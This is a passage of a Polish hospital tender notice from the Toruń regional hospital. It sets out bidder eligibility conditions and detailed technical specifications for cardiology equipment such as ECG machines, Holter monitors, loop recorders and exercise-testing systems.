- Zadanie Nr 1 -      12.000,00 zł,
- Zadanie Nr 2 -      15.000,00 zł,
- Zadanie Nr 3 -      27.000,00 zł,
- Zadanie Nr 4 -        6.000,00 zł,
- Zadanie Nr 5 -      51.600,00 zł,
- Zadanie Nr 6 -      42.000,00 zł
brutto każda dostawa w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 3 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;
Wykonawca składający ofertę na kilka zadań musi wykazać się zrealizowanymi 
3 dostawami o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
- Zadanie Nr 1 -        8.000,00 zł,
- Zadanie Nr 2 -      10.000,00 zł,
- Zadanie Nr 3 -      18.000,00 zł,
- Zadanie Nr 4 -        4.000,00 zł,
- Zadanie Nr 5 -      34.400,00 zł,
- Zadanie Nr 6 -      28.000,00 zł
wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.<br>
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a/ wpis do Rejestru Wyrobów Medycznych lub deklarację zgodności CE potwierdzającą, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r. Nr 93, poz. 896 z późn. zm.);<br>
b/ foldery, katalogi/ prospekty oferowanych wyrobów;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87-100 Toruń, Dział Zamówień Publicznych - pokój nr 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2010 godzina 09:00, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1.<br>
<br>Zamówienie finansowane w ramach projektu nr PL 0480 pn. /Zwiększenie dostępności do wysokospecjalistycznej opieki kardiologicznej w Wojewódzkim Szpitalu Zespolonym w Toruniu/. Finansowanie w 85% z Mechanizmu Finansowania EOG i w 15% z budżetu Samorządu Województwa Kujawsko-Pomorskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa 2 szt. elektrokardiografów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - Elektrokardiograf - 2 szt.:<br>
1. Częstotliwość próbkowania sygnału ekg przez aparat - min. 1000 próbek/s;
2. Współczynnik tłumienia szumów przez aparat CMRR>120dB;
3. Rozdzielczość sygnału wejściowego aparatu - min. 4 uV;
4. Zakres częstotliwości pomiarowej aparatu -  min. 0,05-100Hz;
5. Filtr sieciowy 50 Hz;
6. Filtr mięśniowy w zakresie od 20 do 150 Hz;
7. Niwelowanie płynięcia izolinii (automatyczne sprowadzanie linii zerowej);
8. Kolorowy wyświetlacz graficzny LCD min. 7 cali;
9. Praca w trybie zasilania sieciowego;
10. Praca w trybie zasilania bateryjnego;
11. Możliwość monitorowania pacjenta z wewnętrznego akumulatora przez min.3 godziny;
12. Czas ładowania akumulatorów max. 2,5 godziny;
13. Rejestracja przebiegów na papierze formatu A4;
14. Równoczesna rejestracja 12 odprowadzeń;
15. Prezentacja graficzna badania w postaci  3, 6 lub 12 krzywych na jednej stronie;
16. Wybór różnych raportów w trybie auto;
17. Pomiar parametrów krzywej ekg;
18. Wykrywanie wszczepionego stymulatora;
19. Zabezpieczenie aparatu przed impulsem defibrylacji;
20. Klawiatura alfanumeryczna plus klawisze funkcyjne i klawisz nawigacji;
21. Masa aparatu do 6 kg; 
22. Badanie ekg - tryb manual;
23. Badanie ekg - tryb auto;
24. Tryb arytmii;
25. Czułość (AUTO, 5, 10 , 20, 40 mm/mV);
26. Prędkość wydruku: 5; 12.5; 25; 50 mm/s;
27. Wyświetlanie danych pacjenta na ekranie; 
28. Wyświetlanie  od 3 do12 przebiegów krzywych EKG na ekranie;
29. Identyfikacja grupy odprowadzeń;
30. Wynik obliczonego parametru HR;
31. Sygnalizacja włączenia / wyłączenia filtrów;
32. Wizualna i akustyczna sygnalizacja braku kontaktu elektrod;
33. Kabel ekg modułowy z możliwością wymiany pojedynczych przewodów pacjenta; 
34. Kabelki pacjenta typu - banan;
35. Wyposażenie w elektrody przedsercowe (przyssawkowe) i  kończynowe (klamrowe); 
36. Wózek z pojemnikiem na akcesoria;
37. Gniazdo karty pamięci typu SD;
38. Wyjście do podłączenia zewnętrznego monitora; 
39. Komunikacja z użytkownikiem w języku polskim; 
40. Okres gwarancji - min 24 miesiące; 
41. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika;
42. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat;
43. Bezpłatne szkolenie pracowników Zamawiającego  obsługującego urządzenie;
44. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
45. Bezpłatna instalacja urządzenia; 
46. Elektrokardiograf zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancyjnym);
47. Numer kontaktowy z serwisem Wykonawcy;
48. Sposób dezynfekcji urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa 5 szt. holterów do 24h RR..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 - Holter do 24h RR - 5 szt.:<br>
REJESTRATOR
1. Waga urządzenia wraz z bateriami mniejsza niż 240 g;	
2. Wymiary urządzenia;	
3. Minimalny czas rejestracji 52 godziny;
4. Oscylometryczna metoda pomiaru z obniżaniem krokowym;	
5. Zasilanie max. dwie baterie alkaiczne typu AA 1,5 V lub akumulatory;
6. Zakres pomiarowy ciśnienia skurczowego i rozkurczowego 25 - 260 mmHg;	
7. Dokładność pomiaru  ? 3 mmHg lub wyższa;	
8. Zakres pomiarowy częstości tętna  40 - 200 uderz/min;	
9. Rejestrowanie zdarzeń pacjenta - tzw. events;
10. Ograniczenie ciśnienia w mankiecie do 280 mmHg;	
11. Czas pomiaru do 180 sek.;	
12. Maksymalna ilość pomiarów - min 250;
13. Regulowany czas odstępu między pomiarami;
ANALIZATOR
14. Raport konfigurowany przez użytkownika;	
15. Archiwizacja wykonanych badań. Zestaw komputerowy:  jednostka centralna z dyskiem twardym 360GB, procesor Intel lub podobny, monitor LCD min. 19 cali, drukarka  laserowa czarno-biała, zewnętrzny dysk twardy, pamięć typu /pendrive/ oraz DVD - RW;
KONFIGURACJA ZAMAWIANEGO ZESTAWU
16. Rejestrator wraz z osprzętem mocującym;
17. Analizator -oprogramowanie na komputer PC;	
18. Dwa akumulatory rozmiaru AA wraz z ładowarką;	
19. Mankiet dla dorosłych wielokrotnego użytku do pomiaru ciśnienia o wymiarach szerokość 13 cm, długość pierścienia zaciskającego 28 cm na przedramię o obwodzie od 27 do 35 cm współpracujący z rejestratorem - 1 szt.;
WARUNKI  GWARANCJI I  SERWISU		
20. Okres gwarancji - min 24 miesiące;
21. Czas reakcji serwis - max 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika;	
22. Gwarancja zapewnienia  zakupu części zamiennych  przez okres 10 lat.;
23. Bezpośrednie szkolenie pracowników Zamawiającego obsługujących urządzenie;
24. Bezpłatna instalacja urządzenia;
25. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
26. Holter zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);	
27. Numer kontaktowy z serwisem Wykonawcy;	
28.Sposób dezynfekcji urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.42.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - dostawa 1 szt. holtera EKG..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3 - Holter EKG - 1 szt.:<br>
Analiza
1. Komputerowo wspomagana analiza połączona z klasyfikacją zaburzeń;	
2. Możliwość automatycznego rozpoznawania i klasyfikacji zaburzeń komorowych i nadkomorowych;	
3. Analiza wykorzystująca znakowanie kolorem - z określeniem kolorów przez użytkownika;	
4. Analiza prospektywna retrospektywna (interaktywna i automatyczna);
Konfiguracja parametrów analizy		
1. Pobudzeń: analiza równoległa na trzech kanałach;
2. Zaburzeń rytmu: % przedwczesności pobudzeń nadkomorowych, pauzy, tachykardii komorowej, tachykardii nadkomorowej, napadowego częstoskurczu nadkomorowego, tachy/bradykardii nadkomorowej;
3. Algorytm rozpoznawania migotania przedsionków ustawiany przez użytkownika (zmienność z pobudzenia na pobudzenie oraz długość wstawki);	
4. Odcinka ST: niezależna analiza odcinka ST w 3 kanałach z możliwością modyfikacji wszystkich parametrów, określenie progu obniżenia ST, kąta nachylenia ST, czas trwania epizodu niedotlenienia i separacji między epizodami;
5. Analiza zmienności rytmu zatokowego (czasowa i częstotliwościowa);	
6. Analiza funkcji stymulatora: wszystkie rodzaje stymulatorów, rodzaje wykrywanych błędów, tabele stymulacji;	
7. Przeglądanie/edycja;	
8. Przeglądanie całości zapisu EKG we wszystkich 12-u odprowadzeniach;	
9. Przeglądanie pobudzeń, rodzin morfologicznych, tabeli i trendów;
10. Szybkie przeglądanie przez stronicowanie lub metodą nakładania pobudzeń;	
11.Natychmiastowy dostęp do dowolnego fragmentu EKG z każdego poziomu, także od dowolnej wartości liczbowej z raportu;
12. Możliwość reanalizy zapisu po zmianie parametrów analizy - w całości lub dowolnie wybranej części;	
13. Możliwość analizy różnych fragmentów zapisu wg różnych ustawień algorytmu;
14. Automatyczna kalibracja  wzmocnienia z możliwością ręcznej korekty;
15. Automatyczna detekcja znaczników wydarzeń rejestrowanych przez pacjenta;	
16. Wykrywanie zaburzeń R na T;	
Analiza odcinka ST		
1. Dokładna analiza przemieszczenia i nachylenia ST;	
2. Parametry analizy zgodnie z normami AHA;	
3. Lista epizodów niedotlenienia zawierająca poziom i nachylenie ST, czas trwania epizodu, oraz odp. Fragment EKG;	
Archiwizacja danych:		
1. Zestaw komputerowy:  jednostka centralna z dyskiem twardym 360GB, procesor Intel lub podobny, monitor LCD min. 19 cali, drukarka  laserowa czarno-biała, zewnętrzny dysk twardy, pamięć typu /pendrive/ oraz DVD - RW;	
Raporty/wydruki		
1. Programowa: poprzez określenie selekcji raportu /części raportu przeznaczonych do wydruku;	
2. Wydruk wszystkich zapamiętanych wyników badań;	
3. Możliwość edycji formy oraz treści raportów także tworzenie różnych wzorców raportów;	
4. Odniesienie do krzywej EKG z poziomu raportu;
Transmisja danych / archiwizacja		
1. Praca w sieci: odczyt zapisu ekg z rejestratora i przesłanie go w sieci LAN do komputera na którym zainstalowany jest analizator holterowski oraz odwrotnie przesłanie wyniku badania do komputera z którego wysłany był plik EKG;	
2. Możliwość współpracy z centralą sieci kardiomonitorów celem przeprowadzenia analizy 24 godz. zapisu EKG;
3. Współpraca z istniejącym analizatorem holterowskim w Oddziale Kardiologii;	
Rejestrator cyfrowy - 6 szt.		
1. Rejestracja 3 kanałów oraz odrębnego kanału stymulatora we wszystkich rejestratorach;
2. 3 odprowadzeniowy kabel pacjenta  (preferowane jak najmniejsze ilości elektrod - max. 7); 	
3. Wysoka jakość zapisu bez kompresji zapisu;
4. Kontrola jakości sygnału;	
5. Automatyczna rejestracja momentu rozpoczęcia badania - zegar wewnętrzny i pokazywanie czasu bieżącego (data, godzina);	
6. Identyfikacja pacjenta - z możliwością wprowadzenia danych pacjenta przed rozpoczęciem rejestracji;	
7. Możliwość weryfikacji jakości zapisu EKG przed uruchomieniem rejestracji - na ekranie wbudowanym w rejestrator;	
8. Waga rejestratora < 80g;	
9. Zasilanie - max. 1 bateria alkaliczna typu AAA;
Warunki gwarancji i serwisu		
1. Okres gwarancji - min 24 miesiące;	
2. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika;	
3. Gwarancja zapewnienia  zakupu części zamiennych  przez okres 10 lat;	
4. Bezpłatne szkolenie pracowników  Zamawiającego obsługujących urządzenie;
5. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
6. Bezpłatna instalacja urządzenia;
7. Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji);	
8. Numer kontaktowy z serwisem Wykonawcy;	
9. Sposób dezynfekcji urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.42.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - dostawa 4 szt. rejestratorów pętli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 4:<br> 
I. Rejestrator pętli z wbudowanymi elektrodami - 2 szt.:<br>
1. Zapis cyfrowy bez kompresji, 2 kanałowy;
2. Pojemność pamięci rejestratora min. 20 minut;
3. Częstotliwość próbkowania min. 500Hz;
4. Filtracja zakłóceń; 
5. Tryb pracy w pętli; 
6. Możliwość programowania czasów rejestracji i ilości zapisów; 
7. Wymiary rejestratora max 80x90x30 mm;
8. Waga max 120 gram;
9. Zasilanie z max 1 baterii AA;
10. Czas  pracy w pętli min 30 dni;
11. Czas pracy z przyłożenia min. 1 miesiąc;
12. Wbudowane zewnętrzne elektrody do pracy z przyłożenia; 
13. Współpraca z posiadanym przez szpital oprogramowaniem CardioNavigator;
14. Okres gwarancji - min 24 miesiące;
15. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika; 
16. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat;
17. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie; 
18. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
19. Bezpłatna instalacja urządzenia;
20. Rejestrator pętli zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
21. Numer kontaktowy z serwisem Wykonawcy;
22. Sposób dezynfekcji urządzenia.<br>
II. Rejestrator pętli - 2 szt.<br>
1. Zapis cyfrowy bez kompresji, 2 kanałowy;
2. Pojemność pamięci rejestratora min. 70 minut;
3. Częstotliwość próbkowania min. 500Hz;
4. Filtracja zakłóceń;
5. Tryb pracy w pętli; 
6.Możliwość programowania czasów rejestracji i ilości zapisów; 
7. Wymiary rejestratora max 80x90x30 mm;
8. Waga max 120 gram;
9. Zasilanie z max 1 baterii AA;
10. Czas  pracy min. 14 dni; 
11. Współpraca z posiadanym przez szpital oprogramowaniem CardioNavigator;
12. Okres gwarancji - min 24 miesiące;
13. Czas reakcji serwis - w ciągu 24 godziny licząc od momentu  zgłoszenia awarii przez użytkownika; 
14. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat;
15. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie; 
16. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji;
17. Rejestrator pętli zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji); 
18. Bezpłatna instalacja urządzenia;  
19. Numer kontaktowy z serwisem Wykonawcy;
20. Sposób dezynfekcji urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 - dostawa 1 kpl. zestawu do ergospirometrii..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 5 - Zestaw do ergospirometrii (prób wysiłkowych)  - 1 kpl.:<br>
1 System do próby wysiłkowej: 
1.1 Całość (komputer, monitor, drukarka  termiczna) montowana fabrycznie na mobilnym wózku producenta;
1.2 Monitor kolorowy minimum 19 cali Medical Grade;
1.3 14 kanałowa akwizycja sygnału EKG;
1.4 Analiza do 12 odprowadzeń EKG jednocześnie;
1.5 Ocena odcinka ST: amplituda, nachylenie, indeks, pętle ST/HR dla wszystkich  odprowadzeń;
1.6 Możliwość opcjonalna 15-kanałowej akwizycji sygnału EKG;
1.7 Drukarka termiczna formatu A4 do wydruku zapisu EKG w czasie rzeczywistym oraz raportów; 	
1.8 Moduł zamieniający sygnał analogowy na cyfrowy mocowany bezpośrednio na pacjencie;
1.9 Prędkość wydruku:  5; 12,5; 25; 50 mm/s;
1.10 Czułość zapisu: 2,5/5/10/20 mm/mV;
1.11 Prezentacja ciągłego zapisu EKG z minimum 6 dowolnych odprowadzeń;
1.12 Prezentacja minimum 6 median bieżących ST;
1.13 Prezentacja uśrednionego zespołu QRS na zespole referencyjnym z numerycznym opisem parametrów ST; 
1.14 Możliwość rozbudowy o eksport wyników do formatu Word/PDF;
1.15 Wykonywanie testów w trybie Ramp;
1.16 Archiwizacja badań na CD /RW;
1.17 Możliwość rozbudowy systemu o oprogramowanie do analizy TWA ze standardowych elektrod w czasie próby wysiłkowej;
1.18 Wbudowana klawiatura funkcyjna do sterowania przebiegiem testu oraz wydrukiem;
1.19 Prezentacja graficzna kontroli impedancji podłączenia elektrod do pacjenta;
1.20 Możliwość rozbudowy o funkcję obliczania czynników  ryzyka choroby wieńcowej;
2. Aparat do nieinwazyjnego pomiaru ciśnienia - 2 szt.;
2.1 Metoda pomiaru tonów korotkowa z bramkowaniem sygnałem EKG;
2.2 Zakresy pomiarowe ciśnienia:
a) skurczowe min. od 50-250 mmHg,
b) rozkurczowe min. od 20-150 mmHg
2.3 Automatyczne wykonywanie pomiarów poprzez sterowanie z systemu analizująco-sterującego; 
2.4 Automatyczna transmisja pomiarów ciśnienia do systemu analizująco- sterującego;
3. Bieżnia diagnostyczna:
3.1 Minimalny zakres prędkości pasa ruchomego: 0-21,5 km/godz.;
3.2 Minimalny zakres kąta uniesienia: 0- 25%;
3.3 Maksymalna zewnętrzna długość bieżni:  200 cm;
3.4 Minimalna szerokość użytkowa pasa ruchomego bieżni: 45 cm;
3.5 Obciążenie dopuszczalne: nie mniejsze niż 200 kg;
3.6 Poręcze boczne i przednia;
3.7 Wyłącznik bezpieczeństwa;
3.8 Taśma pasa ruchomego antypoślizgowa i antystatyczna;
4. Ergometr rowerowy:
4.1 Zakres obciążeń min. od 6 do 999 [W];
4.2 Zakres obrotów min. od 30 do 130 [obr/min.];
4.3 Aparat posiadający wyświetlacz graficzny LCD min. 115 x80 [mm];
4.4 Maksymalne możliwe obciążenia min. 140 [kg];
4.5 Oprogramowanie wewnętrzne umożliwiające konfigurowanie testu przez użytkownika;
4.6 Na wyposażeniu interfejs do sterowania ergometrem, programowania parametrów i alarmów;
4.7 Regulacja elektryczna siodełka, ciągła dla pacjentów o wzroście od 120 do 210 cm;
4.8 Aparat wyposażony w automatyczny pomiar ciśnienia;
4.9 Regulacja kierownicy (wysokość i kąt);
5. Aparat do pomiaru zużycia CO2 i O2 w czasie wysiłku:
5.1 Interfejs komunikacyjny z częścią do  próby wysiłkowej; 
5.2 Ocena gazów wydechowych metodą oddech po oddechu;
5.3 Automatyczne określanie progu anaerobowego z możliwością ręcznej korekty;
